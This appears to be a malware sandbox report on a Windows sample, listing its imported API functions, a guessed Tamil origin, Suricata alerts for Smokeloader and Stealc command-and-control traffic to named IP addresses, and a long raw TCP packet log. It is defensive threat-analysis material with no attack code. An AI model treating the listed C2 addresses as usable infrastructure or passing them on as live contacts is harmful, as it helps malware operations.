KERNEL32.dll	SetEnvironmentVariableW, CreateJobObjectW, InterlockedCompareExchange, UnlockFile, CreateHardLinkA, GetTickCount, GetNumberFormatA, GetConsoleAliasExesW, SetCommState, GlobalAlloc, LoadLibraryW, LocalShrink, GetCalendarInfoA, CreateEventA, SetVolumeMountPointA, GetSystemWindowsDirectoryA, GetConsoleAliasExesLengthW, SetConsoleCP, GetFileAttributesA, VerifyVersionInfoA, CreateActCtxA, GetThreadPriorityBoost, GetShortPathNameA, GetLogicalDriveStringsA, GetCurrentDirectoryW, SetLastError, GetProcAddress, PeekConsoleInputW, SetDefaultCommConfigW, GetProcessVersion, LoadLibraryA, InterlockedExchangeAdd, CreateFileMappingW, GetNumberFormatW, OpenEventA, QueryDosDeviceW, SetConsoleWindowInfo, GlobalWire, GetModuleFileNameA, EnumResourceNamesA, VirtualProtect, EnumDateFormatsW, SetProcessShutdownParameters, SetFileShortNameA, GetDiskFreeSpaceExA, ReadConsoleInputW, GetTempPathA, EnumCalendarInfoExA, LCMapStringW, HeapReAlloc, HeapSize, Sleep, GetStringTypeW, GetCurrentProcess, GetLocaleInfoA, SetEndOfFile, CommConfigDialogA, CreateNamedPipeA, MultiByteToWideChar, GetLastError, HeapFree, HeapAlloc, GetModuleHandleW, ExitProcess, DecodePointer, GetCommandLineW, HeapSetInformation, GetStartupInfoW, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetCurrentThreadId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, HeapCreate, WriteFile, GetStdHandle, GetModuleFileNameW, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, RaiseException, WideCharToMultiByte
USER32.dll	CharUpperW, GetSysColor, GetMenuStringA, GetCaretPos, LoadMenuW
GDI32.dll	CreateDCW, GetBitmapBits, GetCharWidthFloatA, GetCharWidth32A

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-09-02T08:20:56.464489+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49729	80	192.168.2.6	2.185.214.11
2024-09-02T08:20:56.464489+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49729	80	192.168.2.6	2.185.214.11
2024-09-02T08:20:38.270691+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49716	80	192.168.2.6	2.185.214.11
2024-09-02T08:20:38.270691+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49716	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:12.689150+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49743	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:04.584929+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49736	80	192.168.2.6	2.185.214.11
2024-09-02T08:20:41.705004+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49719	80	192.168.2.6	2.185.214.11
2024-09-02T08:20:41.705004+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49719	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:09.644123+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49741	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:09.644123+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49741	80	192.168.2.6	2.185.214.11
2024-09-02T08:20:51.830169+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49726	80	192.168.2.6	2.185.214.11
2024-09-02T08:20:44.470379+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49722	80	192.168.2.6	2.185.214.11
2024-09-02T08:20:44.470379+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49722	80	192.168.2.6	2.185.214.11
2024-09-02T08:20:40.547489+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49718	80	192.168.2.6	2.185.214.11
2024-09-02T08:20:40.547489+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49718	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:00.505655+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49733	80	192.168.2.6	2.185.214.11
2024-09-02T08:20:46.136287+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49723	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:18.914730+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49746	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:03.300496+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49735	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:03.300496+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49735	80	192.168.2.6	2.185.214.11
2024-09-02T08:20:39.421290+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49717	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:23.383253+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	49751	80	192.168.2.6	91.202.233.158
2024-09-02T08:20:59.249947+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49731	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:23.479496+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49750	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:07.154202+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49738	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:07.154202+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49738	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:08.487207+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49739	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:20.102228+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49747	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:20.102228+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49747	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:13.363565+0200	TCP	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	49744	443	192.168.2.6	84.32.84.152
2024-09-02T08:20:53.004797+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49727	80	192.168.2.6	2.185.214.11
2024-09-02T08:20:55.344856+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49728	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:17.770363+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49745	80	192.168.2.6	2.185.214.11
2024-09-02T08:20:50.182098+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49725	80	192.168.2.6	2.185.214.11
2024-09-02T08:20:42.946482+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49720	80	192.168.2.6	2.185.214.11
2024-09-02T08:20:42.946482+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49720	80	192.168.2.6	2.185.214.11
2024-09-02T08:20:49.004934+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49724	80	192.168.2.6	2.185.214.11
2024-09-02T08:20:57.633019+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49730	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:11.300474+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49742	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:22.026288+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49748	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:22.026288+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49748	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:05.996542+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49737	80	192.168.2.6	2.185.214.11
2024-09-02T08:21:01.659763+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49734	80	192.168.2.6	2.185.214.11

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 2, 2024 08:20:37.081294060 CEST	49716	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:37.086124897 CEST	80	49716	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:37.086185932 CEST	49716	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:37.086312056 CEST	49716	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:37.086338043 CEST	49716	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:37.091070890 CEST	80	49716	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:37.091200113 CEST	80	49716	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:38.264113903 CEST	80	49716	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:38.268161058 CEST	80	49716	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:38.270690918 CEST	49716	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:38.273922920 CEST	49716	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:38.277081966 CEST	49717	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:38.278737068 CEST	80	49716	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:38.281965017 CEST	80	49717	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:38.282059908 CEST	49717	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:38.282176971 CEST	49717	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:38.282198906 CEST	49717	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:38.287060022 CEST	80	49717	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:38.287074089 CEST	80	49717	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:39.421020985 CEST	80	49717	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:39.421238899 CEST	80	49717	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:39.421289921 CEST	49717	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:39.421878099 CEST	49717	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:39.426666975 CEST	80	49717	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:39.427145958 CEST	49718	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:39.431962967 CEST	80	49718	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:39.432030916 CEST	49718	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:39.432214975 CEST	49718	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:39.432240963 CEST	49718	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:39.436963081 CEST	80	49718	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:39.436999083 CEST	80	49718	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:40.546471119 CEST	80	49718	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:40.547430038 CEST	80	49718	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:40.547488928 CEST	49718	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:40.547553062 CEST	49718	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:40.551486969 CEST	49719	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:40.552716970 CEST	80	49718	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:40.556493998 CEST	80	49719	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:40.556561947 CEST	49719	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:40.556700945 CEST	49719	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:40.556734085 CEST	49719	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:40.561410904 CEST	80	49719	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:40.561525106 CEST	80	49719	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:41.704777956 CEST	80	49719	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:41.704822063 CEST	80	49719	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:41.705003977 CEST	49719	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:41.705292940 CEST	49719	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:41.708224058 CEST	49720	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:41.710024118 CEST	80	49719	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:41.713047981 CEST	80	49720	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:41.713140011 CEST	49720	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:41.713304996 CEST	49720	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:41.713325024 CEST	49720	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:41.718667984 CEST	80	49720	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:41.719120026 CEST	80	49720	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:42.945909023 CEST	80	49720	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:42.945971966 CEST	80	49720	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:42.946481943 CEST	49720	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:42.946504116 CEST	49720	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:42.950337887 CEST	49722	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:42.951311111 CEST	80	49720	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:42.955133915 CEST	80	49722	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:42.955244064 CEST	49722	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:42.955528021 CEST	49722	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:42.955600977 CEST	49722	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:42.960302114 CEST	80	49722	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:42.960450888 CEST	80	49722	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:44.470120907 CEST	80	49722	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:44.470324993 CEST	80	49722	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:44.470379114 CEST	49722	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:44.470412970 CEST	49722	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:44.473486900 CEST	49723	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:44.475147009 CEST	80	49722	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:44.478317022 CEST	80	49723	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:44.478385925 CEST	49723	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:44.478555918 CEST	49723	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:44.478583097 CEST	49723	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:44.483261108 CEST	80	49723	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:44.483387947 CEST	80	49723	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:46.136173010 CEST	80	49723	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:46.136195898 CEST	80	49723	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:46.136286974 CEST	49723	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:46.136498928 CEST	49723	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:46.138982058 CEST	49724	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:46.141206980 CEST	80	49723	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:46.143790960 CEST	80	49724	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:46.143860102 CEST	49724	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:46.143955946 CEST	49724	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:46.143980026 CEST	49724	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:46.148662090 CEST	80	49724	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:46.148832083 CEST	80	49724	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:49.003756046 CEST	80	49724	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:49.004859924 CEST	80	49724	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:49.004934072 CEST	49724	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:49.005085945 CEST	49724	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:49.007524014 CEST	49725	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:49.009972095 CEST	80	49724	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:49.012300014 CEST	80	49725	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:49.012377024 CEST	49725	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:49.012497902 CEST	49725	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:49.012527943 CEST	49725	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:49.017221928 CEST	80	49725	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:49.017589092 CEST	80	49725	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:50.181823015 CEST	80	49725	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:50.181957006 CEST	80	49725	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:50.182097912 CEST	49725	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:50.182125092 CEST	49725	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:50.184869051 CEST	49726	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:50.186882019 CEST	80	49725	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:50.189688921 CEST	80	49726	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:50.189754009 CEST	49726	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:50.189841986 CEST	49726	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:50.189861059 CEST	49726	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:50.195874929 CEST	80	49726	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:50.195884943 CEST	80	49726	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:51.829910994 CEST	80	49726	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:51.829991102 CEST	80	49726	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:51.830168962 CEST	49726	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:51.830672026 CEST	49726	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:51.832534075 CEST	49727	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:51.835361004 CEST	80	49726	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:51.837318897 CEST	80	49727	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:51.837413073 CEST	49727	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:51.837527990 CEST	49727	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:51.837546110 CEST	49727	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:51.842286110 CEST	80	49727	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:51.842406988 CEST	80	49727	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:53.004174948 CEST	80	49727	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:53.004703999 CEST	80	49727	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:53.004796982 CEST	49727	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:53.004947901 CEST	49727	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:53.007256985 CEST	49728	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:53.010400057 CEST	80	49727	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:53.012109995 CEST	80	49728	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:53.014869928 CEST	49728	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:53.014969110 CEST	49728	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:53.014986038 CEST	49728	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:53.019746065 CEST	80	49728	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:53.019838095 CEST	80	49728	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:55.344763041 CEST	80	49728	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:55.344786882 CEST	80	49728	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:55.344799042 CEST	80	49728	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:55.344856024 CEST	49728	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:55.344897032 CEST	49728	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:55.345069885 CEST	49728	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:55.347778082 CEST	49729	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:55.350727081 CEST	80	49728	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:55.353598118 CEST	80	49729	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:55.353693962 CEST	49729	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:55.353796959 CEST	49729	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:55.353818893 CEST	49729	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:55.358622074 CEST	80	49729	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:55.358663082 CEST	80	49729	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:56.464382887 CEST	80	49729	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:56.464431047 CEST	80	49729	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:56.464488983 CEST	49729	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:56.464685917 CEST	49729	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:56.467499018 CEST	49730	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:56.469458103 CEST	80	49729	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:56.472434998 CEST	80	49730	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:56.472507954 CEST	49730	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:56.472636938 CEST	49730	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:56.472665071 CEST	49730	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:56.477374077 CEST	80	49730	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:56.477406979 CEST	80	49730	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:57.632760048 CEST	80	49730	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:57.632942915 CEST	80	49730	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:57.633018970 CEST	49730	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:57.633061886 CEST	49730	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:57.635406971 CEST	49731	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:57.638137102 CEST	80	49730	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:57.640302896 CEST	80	49731	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:57.640499115 CEST	49731	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:57.640642881 CEST	49731	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:57.640660048 CEST	49731	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:57.645416021 CEST	80	49731	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:57.645512104 CEST	80	49731	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:59.249829054 CEST	80	49731	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:59.249847889 CEST	80	49731	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:59.249947071 CEST	49731	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:59.250149012 CEST	49731	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:59.252558947 CEST	49733	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:59.254965067 CEST	80	49731	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:59.257432938 CEST	80	49733	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:59.257525921 CEST	49733	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:59.257668972 CEST	49733	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:59.257703066 CEST	49733	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:20:59.262512922 CEST	80	49733	2.185.214.11	192.168.2.6
Sep 2, 2024 08:20:59.262540102 CEST	80	49733	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:00.505430937 CEST	80	49733	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:00.505455017 CEST	80	49733	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:00.505655050 CEST	49733	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:00.506056070 CEST	49733	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:00.508670092 CEST	49734	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:00.510979891 CEST	80	49733	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:00.513542891 CEST	80	49734	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:00.513629913 CEST	49734	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:00.513787031 CEST	49734	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:00.513798952 CEST	49734	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:00.519201040 CEST	80	49734	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:00.519212008 CEST	80	49734	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:01.659632921 CEST	80	49734	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:01.659653902 CEST	80	49734	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:01.659763098 CEST	49734	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:01.660022020 CEST	49734	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:01.662322044 CEST	49735	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:01.665069103 CEST	80	49734	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:01.669159889 CEST	80	49735	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:01.669245005 CEST	49735	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:01.669356108 CEST	49735	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:01.669368982 CEST	49735	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:01.674308062 CEST	80	49735	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:01.674318075 CEST	80	49735	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:03.300298929 CEST	80	49735	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:03.300440073 CEST	80	49735	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:03.300496101 CEST	49735	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:03.300554037 CEST	49735	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:03.302830935 CEST	49736	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:03.305320024 CEST	80	49735	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:03.307615042 CEST	80	49736	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:03.307693005 CEST	49736	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:03.307833910 CEST	49736	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:03.307857037 CEST	49736	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:03.312582016 CEST	80	49736	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:03.312716961 CEST	80	49736	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:04.584748030 CEST	80	49736	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:04.584866047 CEST	80	49736	2.185.214.11	192.168.2.6
Sep 2, 2024 08:21:04.584928989 CEST	49736	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:04.615873098 CEST	49736	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:04.692626953 CEST	49737	80	192.168.2.6	2.185.214.11
Sep 2, 2024 08:21:04.828427076 CEST	80	49736	2.185.214.11	192.168.2.6
